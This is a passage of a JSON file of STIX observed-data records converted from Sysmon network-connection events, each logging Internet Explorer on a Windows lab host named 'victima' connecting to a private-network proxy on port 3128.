| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "14": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "15": { | |
| "type": "x-ecs-network", | |
| "community_id": "1:YdVVEiqq3+aZnkQeSNP61ChXBJQ=", | |
| "direction": "egress" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:28.939Z", | |
| "last_observed": "2022-07-27T14:26:28.939Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--a3c80aee-274b-4123-a2fc-18684d57cdb3", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.930Z", | |
| "modified": "2022-07-28T16:05:22.930Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "iexplore.exe", | |
| "pid": 8872, | |
| "binary_ref": "3", | |
| "creator_user_ref": "14", | |
| "opened_connection_refs": [ | |
| "5" | |
| ] | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "7", | |
| "ingested": "2022-07-27T14:26:39.493638496Z", | |
| "code": "3", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:26:33.134Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Network connection detected (rule: NetworkConnect)", | |
| "category": [ | |
| [ | |
| "network" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start", | |
| "connection", | |
| "protocol" | |
| ], | |
| "user_ref": "14", | |
| "network_ref": "5" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4b03-62e1-df01-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "iexplore.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Internet Explorer" | |
| }, | |
| "5": { | |
| "type": "network-traffic", | |
| "dst_port": 3128, | |
| "dst_ref": "6", | |
| "src_port": 50224, | |
| "src_ref": "11", | |
| "protocols": [ | |
| "tcp", | |
| "ipv4" | |
| ] | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.2" | |
| }, | |
| "7": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "8", | |
| "9" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "10" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "8": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "9": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "10": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "11": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "12": { | |
| "type": "x-ecs-source", | |
| "domain": "victima" | |
| }, | |
| "13": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "14": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "15": { | |
| "type": "x-ecs-network", | |
| "community_id": "1:030lFEoFlYQRErMI69XSZcqmmDo=", | |
| "direction": "egress" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:29.100Z", | |
| "last_observed": "2022-07-27T14:26:29.100Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--e5a900b5-1583-43af-9a44-acd1576110c4", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.930Z", | |
| "modified": "2022-07-28T16:05:22.930Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "iexplore.exe", | |
| "pid": 8872, | |
| "binary_ref": "3", | |
| "creator_user_ref": "14", | |
| "opened_connection_refs": [ | |
| "5" | |
| ] | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "7", | |
| "ingested": "2022-07-27T14:26:39.496708667Z", | |
| "code": "3", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:26:33.135Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Network connection detected (rule: NetworkConnect)", | |
| "category": [ | |
| [ | |
| "network" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start", | |
| "connection", | |
| "protocol" | |
| ], | |
| "user_ref": "14", | |
| "network_ref": "5" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4b03-62e1-df01-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "iexplore.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Internet Explorer" | |
| }, | |
| "5": { | |
| "type": "network-traffic", | |
| "dst_port": 3128, | |
| "dst_ref": "6", | |
| "src_port": 50229, | |
| "src_ref": "11", | |
| "protocols": [ | |
| "tcp", | |
| "ipv4" | |
| ] | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.2" | |
| }, | |
| "7": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "8", | |
| "9" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "10" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "8": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "9": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "10": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "11": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "12": { | |
| "type": "x-ecs-source", | |
| "domain": "victima" | |
| }, | |
| "13": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "14": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "15": { | |
| "type": "x-ecs-network", | |
| "community_id": "1:Y+NsD9eOIYd2SsCOvWopjwKvnTY=", | |
| "direction": "egress" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:29.425Z", | |
| "last_observed": "2022-07-27T14:26:29.425Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--24d97ab9-2257-460f-9212-0dfbb30c104d", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.931Z", | |
| "modified": "2022-07-28T16:05:22.931Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "iexplore.exe", | |
| "pid": 8872, | |
| "binary_ref": "3", | |
| "creator_user_ref": "14", | |
| "opened_connection_refs": [ | |
| "5" | |
| ] | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "7", | |
| "ingested": "2022-07-27T14:26:39.497298264Z", | |
| "code": "3", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:26:33.135Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Network connection detected (rule: NetworkConnect)", | |
| "category": [ | |
| [ | |
| "network" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start", | |
| "connection", | |
| "protocol" | |
| ], | |
| "user_ref": "14", | |
| "network_ref": "5" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4b03-62e1-df01-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "iexplore.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Internet Explorer" | |
| }, | |
| "5": { | |
| "type": "network-traffic", | |
| "dst_port": 3128, | |
| "dst_ref": "6", | |
| "src_port": 50230, | |
| "src_ref": "11", | |
| "protocols": [ | |
| "tcp", | |
| "ipv4" | |
| ] | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.2" | |
| }, | |
| "7": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "8", | |
| "9" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "10" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "8": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "9": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "10": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "11": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "12": { | |
| "type": "x-ecs-source", | |
| "domain": "victima" | |
| }, | |
| "13": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "14": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "15": { | |
| "type": "x-ecs-network", | |
| "community_id": "1:VGrklgCfoF1T+Vd53qkltafiOdY=", | |
| "direction": "egress" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:29.496Z", | |
| "last_observed": "2022-07-27T14:26:29.496Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--18c0444f-98e0-447e-8c23-5a974bd11a6c", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.931Z", | |
| "modified": "2022-07-28T16:05:22.931Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "iexplore.exe", | |
| "pid": 8872, | |
| "binary_ref": "3", | |
| "creator_user_ref": "14", | |
| "opened_connection_refs": [ | |
| "5" | |
| ] | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "7", | |
| "ingested": "2022-07-27T14:26:39.497887957Z", | |
| "code": "3", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:26:33.135Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Network connection detected (rule: NetworkConnect)", | |
| "category": [ | |
| [ | |
| "network" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start", | |
| "connection", | |
| "protocol" | |
| ], | |
| "user_ref": "14", | |
| "network_ref": "5" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4b03-62e1-df01-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "iexplore.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Internet Explorer" | |
| }, | |
| "5": { | |
| "type": "network-traffic", | |
| "dst_port": 3128, | |
| "dst_ref": "6", | |
| "src_port": 50231, | |
| "src_ref": "11", | |
| "protocols": [ | |
| "tcp", | |
| "ipv4" | |
| ] | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.2" | |
| }, | |
| "7": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "8", | |
| "9" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "10" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "8": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "9": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "10": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "11": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "12": { | |
| "type": "x-ecs-source", | |
| "domain": "victima" | |
| }, | |
| "13": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "14": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "15": { | |
| "type": "x-ecs-network", | |
| "community_id": "1:xbgKkoTz3dafgN6HgWfQV8dAKBs=", | |
| "direction": "egress" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:29.576Z", | |
| "last_observed": "2022-07-27T14:26:29.576Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--d42a35ad-b0b2-474d-9c37-3946543caf32", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.931Z", | |
| "modified": "2022-07-28T16:05:22.931Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "iexplore.exe", | |
| "pid": 8872, | |
| "binary_ref": "3", | |
| "creator_user_ref": "14", | |
| "opened_connection_refs": [ | |
| "5" | |
| ] | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "7", | |
| "ingested": "2022-07-27T14:26:39.573169515Z", | |
| "code": "3", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "kind": "event", | |
| "created": "2022-07-27T14:26:33.250Z", | |
| "module": "sysmon", | |
| "action": "Network connection detected (rule: NetworkConnect)", | |
| "category": [ | |
| [ | |
| "network" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start", | |
| "connection", | |
| "protocol" | |
| ], | |
| "user_ref": "14", | |
| "network_ref": "5" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4b03-62e1-df01-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "iexplore.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Internet Explorer" | |
| }, | |
| "5": { | |
| "type": "network-traffic", | |
| "dst_port": 3128, | |
| "dst_ref": "6", | |
| "src_port": 50261, | |
| "src_ref": "11", | |
| "protocols": [ | |
| "tcp", | |
| "ipv4" | |
| ] | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.2" | |
| }, | |
| "7": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "8", | |
| "9" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "10" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "8": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "9": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "10": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "11": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "12": { | |
| "type": "x-ecs-source", | |
| "domain": "victima" | |
| }, | |
| "13": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "14": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "15": { | |
| "type": "x-ecs-network", | |
| "community_id": "1:mXwrIPmRKiopmUzDlPgyRNc1duc=", | |
| "direction": "egress" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:30.634Z", | |
| "last_observed": "2022-07-27T14:26:30.634Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--89cd7502-d039-45ab-9512-3063c13655ec", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.932Z", | |
| "modified": "2022-07-28T16:05:22.932Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "iexplore.exe", | |
| "pid": 8872, | |
| "binary_ref": "3", | |
| "creator_user_ref": "14", | |
| "opened_connection_refs": [ | |
| "5" | |
| ] | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "7", | |
| "ingested": "2022-07-27T14:26:40.670015314Z", | |
| "code": "3", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "kind": "event", | |
| "created": "2022-07-27T14:26:34.329Z", | |
| "module": "sysmon", | |
| "action": "Network connection detected (rule: NetworkConnect)", | |
| "category": [ | |
| [ | |
| "network" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start", | |
| "connection", | |
| "protocol" | |
| ], | |
| "user_ref": "14", | |
| "network_ref": "5" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4b03-62e1-df01-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "iexplore.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Internet Explorer" | |
| }, | |
| "5": { | |
| "type": "network-traffic", | |
| "dst_port": 3128, | |
| "dst_ref": "6", | |
| "src_port": 50273, | |
| "src_ref": "11", | |
| "protocols": [ | |
| "tcp", | |
| "ipv4" | |
| ] | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.2" | |
| }, | |
| "7": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "8", | |
| "9" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "10" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "8": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "9": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "10": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "11": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "12": { | |
| "type": "x-ecs-source", | |
| "domain": "victima" | |
| }, | |
| "13": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "14": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "15": { | |
| "type": "x-ecs-network", | |
| "community_id": "1:y0zXsQ0DKoRzamBTFSUAePOqbNo=", | |
| "direction": "egress" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:31.677Z", | |
| "last_observed": "2022-07-27T14:26:31.677Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--bdfc0285-8e7a-466a-af8e-4708ef656dbc", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.932Z", | |
| "modified": "2022-07-28T16:05:22.932Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "iexplore.exe", | |
| "pid": 8872, | |
| "binary_ref": "3", | |
| "creator_user_ref": "14", | |
| "opened_connection_refs": [ | |
| "5" | |
| ] | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "7", | |
| "ingested": "2022-07-27T14:26:40.673902090Z", | |
| "code": "3", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:26:34.329Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Network connection detected (rule: NetworkConnect)", | |
| "category": [ | |
| [ | |
| "network" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start", | |
| "connection", | |
| "protocol" | |
| ], | |
| "user_ref": "14", | |
| "network_ref": "5" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4b03-62e1-df01-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "iexplore.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Internet Explorer" | |
| }, | |
| "5": { | |
| "type": "network-traffic", | |
| "dst_port": 3128, | |
| "dst_ref": "6", | |
| "src_port": 50279, | |
| "src_ref": "11", | |
| "protocols": [ | |
| "tcp", | |
| "ipv4" | |
| ] | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.2" | |
| }, | |
| "7": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "8", | |
| "9" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "10" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "8": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "9": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "10": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "11": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "12": { | |
| "type": "x-ecs-source", | |
| "domain": "victima" | |
| }, | |
| "13": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "14": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "15": { | |
| "type": "x-ecs-network", | |
| "community_id": "1:vi0bFodzIbr0dkjczS1R9yNL/G4=", | |
| "direction": "egress" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:31.889Z", | |
| "last_observed": "2022-07-27T14:26:31.889Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--33a2fbc8-4815-404c-ab73-c78d79018b1a", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.933Z", | |
| "modified": "2022-07-28T16:05:22.933Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "iexplore.exe", | |
| "pid": 8872, | |
| "binary_ref": "3", | |
| "creator_user_ref": "14", | |
| "opened_connection_refs": [ | |
| "5" | |
| ] | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "7", | |
| "ingested": "2022-07-27T14:26:40.674554019Z", | |
| "code": "3", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:26:34.329Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Network connection detected (rule: NetworkConnect)", | |
| "category": [ | |
| [ | |
| "network" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start", | |
| "connection", | |
| "protocol" | |
| ], | |
| "user_ref": "14", | |
| "network_ref": "5" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4b03-62e1-df01-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "iexplore.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Internet Explorer" | |
| }, | |
| "5": { | |
| "type": "network-traffic", | |
| "dst_port": 3128, | |
| "dst_ref": "6", | |
| "src_port": 50280, | |
| "src_ref": "11", | |
| "protocols": [ | |
| "tcp", | |
| "ipv4" | |
| ] | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.2" | |
| }, | |
| "7": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "8", | |
| "9" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "10" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "8": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "9": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "10": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "11": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "12": { | |
| "type": "x-ecs-source", | |
| "domain": "victima" | |
| }, | |
| "13": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "14": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "15": { | |
| "type": "x-ecs-network", | |
| "community_id": "1:qLNHiebVRgTHpq3SDmoZpWMSEMk=", | |
| "direction": "egress" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:31.894Z", | |
| "last_observed": "2022-07-27T14:26:31.894Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--3041793f-2ef0-4a96-b4f2-510982fa1701", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.933Z", | |
| "modified": "2022-07-28T16:05:22.933Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "iexplore.exe", | |
| "pid": 8872, | |
| "binary_ref": "3", | |
| "creator_user_ref": "14", | |
| "opened_connection_refs": [ | |
| "5" | |
| ] | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "7", | |
| "ingested": "2022-07-27T14:26:41.760469549Z", | |
| "code": "3", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "kind": "event", | |
| "created": "2022-07-27T14:26:35.420Z", | |
| "module": "sysmon", | |
| "action": "Network connection detected (rule: NetworkConnect)", | |
| "category": [ | |
| [ | |
| "network" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start", | |
| "connection", | |
| "protocol" | |
| ], | |
| "user_ref": "14", | |
| "network_ref": "5" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4b03-62e1-df01-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "iexplore.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Internet Explorer" | |
| }, | |
| "5": { | |
| "type": "network-traffic", | |
| "dst_port": 3128, | |
| "dst_ref": "6", | |
| "src_port": 50281, | |
| "src_ref": "11", | |
| "protocols": [ | |
| "tcp", | |
| "ipv4" | |
| ] | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.2" | |
| }, | |
| "7": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "8", | |
| "9" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "10" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "8": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "9": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "10": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "11": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "12": { | |
| "type": "x-ecs-source", | |
| "domain": "victima" | |
| }, | |
| "13": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "14": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "15": { | |
| "type": "x-ecs-network", | |
| "community_id": "1:NQ5v4ib71NrGNz5JNkTsfHzVH5A=", | |
| "direction": "egress" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:32.635Z", | |
| "last_observed": "2022-07-27T14:26:32.635Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--4894c9b0-1f5e-4de7-8d76-050ff16876a4", | |
